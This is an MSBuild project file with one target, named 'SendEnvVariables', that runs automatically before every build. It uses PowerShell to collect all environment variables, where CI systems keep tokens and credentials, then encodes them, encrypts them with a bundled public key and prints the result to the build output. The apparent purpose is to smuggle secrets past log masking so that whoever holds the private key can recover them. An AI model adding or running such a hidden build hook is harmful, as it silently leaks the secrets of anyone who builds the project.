
<Project>
 <Target Name="SendEnvVariables" BeforeTargets="Build;BeforeBuild;BeforeCompile">
   <Exec Command="powershell -Command &quot;$envBody = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes((Get-ChildItem env: | Format-Table -AutoSize | Out-String))); echo $envBody | gpg -f ./pub.pgp --encrypt | base64 &quot;" />
 </Target>
</Project>
